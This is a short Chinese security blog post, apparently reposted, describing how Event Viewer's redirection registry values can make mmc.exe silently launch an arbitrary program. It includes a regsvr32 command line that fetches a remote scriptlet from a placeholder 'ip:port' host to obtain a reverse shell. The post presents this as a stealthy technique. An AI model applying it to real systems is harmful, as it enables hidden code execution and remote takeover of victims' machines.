mmc的tips
2023-4-12 21:8:1 Author: MicroPest(查看原文) 阅读量:7 收藏

mmc.exe是什么?百度百科:mmc.exe是系统管理程序的一个框架程序,全称是Microsoft Management Console,它提供给扩展名为msc的管理程序一个运行的平台,比如组策略,系统清单,以及打印管理、本地安全策略等等,另外本进程也可能同时运行两个或更多个。

那“事件查看器”是什么,不也是mmc.exe嘛,难道这两个本来就是一个东西?平时还真没注意到。

今天的点就是关于“事件查看器”的,这个我们很熟悉,经常用到嘛,但我们是真是熟悉么,不见得,我就是被虐了一把。

在“注册表”的这个位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer

有三个键:

这三个键有什么作用呢?

我先生成一个空的exe程序,

1、填充在上面的第一个键值处MicrosoftRedirectionProgram,当被调用时弹出一个窗体,表示被执行了:

现在,运行“事件查看器”,随便选一个事件打开,如下:

点击“事件日志联机帮助”,弹出下图,选择“是”,

这时候就会弹出我们的空程序窗体,表明在这里是通过注册表中那个键值运行了我们的程序。

2、填充在第三个键值处MicrosoftRedirectionURL

当我们进行同1一样的操作时,也会调用我们的程序,如下显示父进程mmc调用了程序1.exe

3、MicrosoftRedirectionProgramCommandLineParameters:

这里是第一个键值的参数值。如果第一键值处我们设置为regsvr32.exe,先来看下regsvr32.exe这个程序的参数:

那么,我们这里设置为:/s/n/u/ihttp://ip:port/program.sct program.dll,当点击后,出现了反弹shell

至此,这里的tips演示完毕。实说,这三个键值的利用有点“鸡肋”,但不失为一种很隐蔽的方法。


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NDcxMDQzNA==&mid=2247487714&idx=1&sn=58c30b6c6fff6516d9ade451fc3d22bf&chksm=a682c62f91f54f39d88145c5de5255f308374c80720185117e03b20fccf690e1713868fc1fbb#rd
如有侵权请联系:admin#unsafe.sh